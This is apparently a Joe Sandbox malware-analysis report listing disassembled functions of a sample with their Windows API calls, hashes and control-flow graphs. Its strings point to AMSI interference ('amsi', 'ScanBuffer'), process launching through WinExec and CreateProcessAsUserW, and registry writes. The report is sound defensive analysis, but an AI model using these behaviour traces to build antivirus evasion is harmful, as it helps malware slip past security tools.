                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                                                                                                                                                                                                                                  • String ID: DllGetClassObject$W$amsi
                                                                                                                                                                                                                                                                                                                                  • API String ID: 941070894-2671292670
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ee21059532828447dd83b60ee7d17443e95b16993ea9ff1a497287957ae984a3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bf65925f128882c8595f0ff4cc1980c6b85926372cfd812aa37eeb4dfb9f0698
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee21059532828447dd83b60ee7d17443e95b16993ea9ff1a497287957ae984a3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAF08C5044C382BAE302E2748C49F4BBACD8B62264F108A5CB1A89B3D2D679D5059BB7
                                                                                                                                                                                                                                                                                                                                  Function 02DB1A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 13227 2db1a8c-2db1a9b 13228 2db1b6c-2db1b6f 13227->13228 13229 2db1aa1-2db1aa5 13227->13229 13230 2db1c5c-2db1c60 13228->13230 13231 2db1b75-2db1b7f 13228->13231 13232 2db1b08-2db1b11 13229->13232 13233 2db1aa7-2db1aae 13229->13233 13234 2db16e8-2db170b call 2db1644 VirtualFree 13230->13234 13235 2db1c66-2db1c6b 13230->13235 13237 2db1b3c-2db1b49 13231->13237 13238 2db1b81-2db1b8d 13231->13238 13232->13233 13236 2db1b13-2db1b27 Sleep 13232->13236 13239 2db1adc-2db1ade 13233->13239 13240 2db1ab0-2db1abb 13233->13240 13255 2db170d-2db1714 13234->13255 13256 2db1716 13234->13256 13236->13233 13244 2db1b2d-2db1b38 Sleep 13236->13244 13237->13238 13245 2db1b4b-2db1b5f Sleep 13237->13245 13246 2db1b8f-2db1b92 13238->13246 13247 2db1bc4-2db1bd2 13238->13247 13242 2db1af3 13239->13242 13243 2db1ae0-2db1af1 13239->13243 13248 2db1abd-2db1ac2 13240->13248 13249 2db1ac4-2db1ad9 13240->13249 13251 2db1af6-2db1b03 13242->13251 13243->13242 13243->13251 13244->13232 13245->13238 13254 2db1b61-2db1b68 Sleep 13245->13254 13252 2db1b96-2db1b9a 13246->13252 13247->13252 13253 2db1bd4-2db1bd9 call 2db14c0 13247->13253 13251->13231 13258 2db1bdc-2db1be9 13252->13258 13259 2db1b9c-2db1ba2 13252->13259 13253->13252 13254->13237 13262 2db1719-2db1723 13255->13262 13256->13262 13258->13259 13264 2db1beb-2db1bf2 call 2db14c0 13258->13264 13260 2db1bf4-2db1bfe 13259->13260 13261 2db1ba4-2db1bc2 call 2db1500 13259->13261 13267 2db1c2c-2db1c59 call 2db1560 13260->13267 13268 2db1c00-2db1c28 VirtualFree 13260->13268 13264->13259
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?), ref: 02DB1B17
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?), ref: 02DB1B31
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c5146fc8c64ceb0527b69515ed7ad316c5a2b62f08b48537da0f32892f051818
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e19b282c266b2183d6713acdacc8af8dc6b342a82d157325434577ad05b2acfc
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5146fc8c64ceb0527b69515ed7ad316c5a2b62f08b48537da0f32892f051818
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4251CE71A40240CFDB16CF68C9B8796BBE0EF46315F1881AED44A8B382D770D885CBA5
                                                                                                                                                                                                                                                                                                                                  Function 02DCE4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02DCE5F6
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CheckConnectionInternet
                                                                                                                                                                                                                                                                                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3847983778-3852638603
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cb34e028d2bbaae4bc5bec2b7c2b903a745c975875d9f9776284e30d5b6fbd2d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 17cab2fc2ea6b27c36e9349bc5e8f0bcb84cfaffa143767c996f7f7dea4156fb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb34e028d2bbaae4bc5bec2b7c2b903a745c975875d9f9776284e30d5b6fbd2d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1413175B50149DBEB02FBA4D861EDE73BAEF88700F60442AE042E7342DA34ED058F65
                                                                                                                                                                                                                                                                                                                                  Function 02DC8788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
                                                                                                                                                                                                                                                                                                                                  • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DC8814
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                                                                                                                                                                                                                                  • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3130163322-2353454454
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bdc09d97a2a43cd6d35cda751dbf77a4e32fffbf99f2195a753f5b92f1b0ad6f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d1701634682a01734cce39138970127d4c797ce59d8dba013638226697bad8af
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdc09d97a2a43cd6d35cda751dbf77a4e32fffbf99f2195a753f5b92f1b0ad6f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D311D3B2684249AFEB42EEA9EC51F9A77EDEB4C700FA14414BA09D3700C634ED509B24
                                                                                                                                                                                                                                                                                                                                  Function 02DC85BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
                                                                                                                                                                                                                                                                                                                                  • WinExec.KERNEL32(?,?), ref: 02DC8624
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                                                                                                                                                                                                  • String ID: Kernel32$WinExec
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2292790416-3609268280
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c0141b7e6f578cfa7f9cbea6b31e07bd962499bce3e055bd173477f5a294b20d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5d18bb311103f4e450a6484769faee6bc3cc11aa263cbf392281359116d32803
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0141b7e6f578cfa7f9cbea6b31e07bd962499bce3e055bd173477f5a294b20d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F016D706C4289AFEB02EAA5EC25F9AB7E9EB48700FA14424B901D3740D670AD109A24
                                                                                                                                                                                                                                                                                                                                  Function 02DC85BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DC823C,?,?,00000000,?,02DC7A7E,ntdll,00000000,00000000,02DC7AC3,?,?,00000000), ref: 02DC820A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DC821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
                                                                                                                                                                                                                                                                                                                                  • WinExec.KERNEL32(?,?), ref: 02DC8624
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                                                                                                                                                                                                  • String ID: Kernel32$WinExec
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2292790416-3609268280
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c460016e78bd92f26b5c767a058edbb9877acf5a7440e48d7a4ede1742d9d482
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1d4f50c62438906bb950bb3ffb10a5b2b4b9aabfcfbf40d86fbd994da00eed4c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c460016e78bd92f26b5c767a058edbb9877acf5a7440e48d7a4ede1742d9d482
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58F081706C4289EFEB02EBA5EC25F9EB7EDEB48700FA14424F901D3740D670AD109A34
                                                                                                                                                                                                                                                                                                                                  Function 02DC5C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02DC5D74,?,?,02DC3900,00000001), ref: 02DC5C88
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02DC5D74,?,?,02DC3900,00000001), ref: 02DC5CB6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB7D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02DC3900,02DC5CF6,00000000,02DC5D74,?,?,02DC3900), ref: 02DB7DAA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB7F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02DC3900,02DC5D11,00000000,02DC5D74,?,?,02DC3900,00000001), ref: 02DB7FB7
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,02DC5D74,?,?,02DC3900,00000001), ref: 02DC5D1B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DBA778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02DBC3D9,00000000,02DBC433), ref: 02DBA797
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 503785936-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f6f9e943804570c88df048486ed8da59cbdd9148c19298f677b85cb46d2084be
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b360a0f5b4f3aa236693572ee464826acf47cf86d44ec73dcaee2b8cc063e231
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6f9e943804570c88df048486ed8da59cbdd9148c19298f677b85cb46d2084be
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07319170A006099FDB02EBA4D891BDDB7F6EF48700F908069D505BB380D7756D048FB1
                                                                                                                                                                                                                                                                                                                                  Function 02DCF212 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,02F2BA58), ref: 02DCF258
                                                                                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(000008FC,00000000,00000000,00000001,00000000,0000001C,00000000,02DCF2C3), ref: 02DCF290
                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(000008FC,000008FC,00000000,00000000,00000001,00000000,0000001C,00000000,02DCF2C3), ref: 02DCF29B
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 779948276-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6827cd7153854c750b73dea1fe6fbf40fe4681292e6bb2394f434a3cd08bfed8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 876e3fb1836a3cbbce7941d51a5c969139515107e97aad31b6d76577ba1bc1f8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6827cd7153854c750b73dea1fe6fbf40fe4681292e6bb2394f434a3cd08bfed8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E112B71A04208EFEB01EFA8DCA1ADAB7EDEF09340F504465B905D7751DA30EE148F64
                                                                                                                                                                                                                                                                                                                                  Function 02DCF214 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,02F2BA58), ref: 02DCF258
                                                                                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(000008FC,00000000,00000000,00000001,00000000,0000001C,00000000,02DCF2C3), ref: 02DCF290
                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(000008FC,000008FC,00000000,00000000,00000001,00000000,0000001C,00000000,02DCF2C3), ref: 02DCF29B
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 779948276-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0ca7878814e8be0203aceb31abd2529bc78f12d90c33b1685efbc43c1953cc3f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8467119a998ac4f071537115a6aef01e927c0cd3b230458a4c59383a55337861
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ca7878814e8be0203aceb31abd2529bc78f12d90c33b1685efbc43c1953cc3f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC112B71A04208EFEB01EFA8D8A1ADAB7EDEF09340F504465B905D7751DA30EE148F64
                                                                                                                                                                                                                                                                                                                                  Function 02DBE364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 093ed3ed5bc82fd331c14d7b8422de0262f99a82294c7db6c599c501a47ab32d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: dcc6c35d7ef34f8a2514ef1afb498ed0b752ff842ccf42fc69a07ce5f78b4a4b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 093ed3ed5bc82fd331c14d7b8422de0262f99a82294c7db6c599c501a47ab32d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFF0A454718110CB8B23773A88A45E9379AAF40342FD05836A4C79B301CB69CC45C772
                                                                                                                                                                                                                                                                                                                                  Function 02DB4D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(02DCF4A4), ref: 02DB4C6E
                                                                                                                                                                                                                                                                                                                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 02DB4D5B
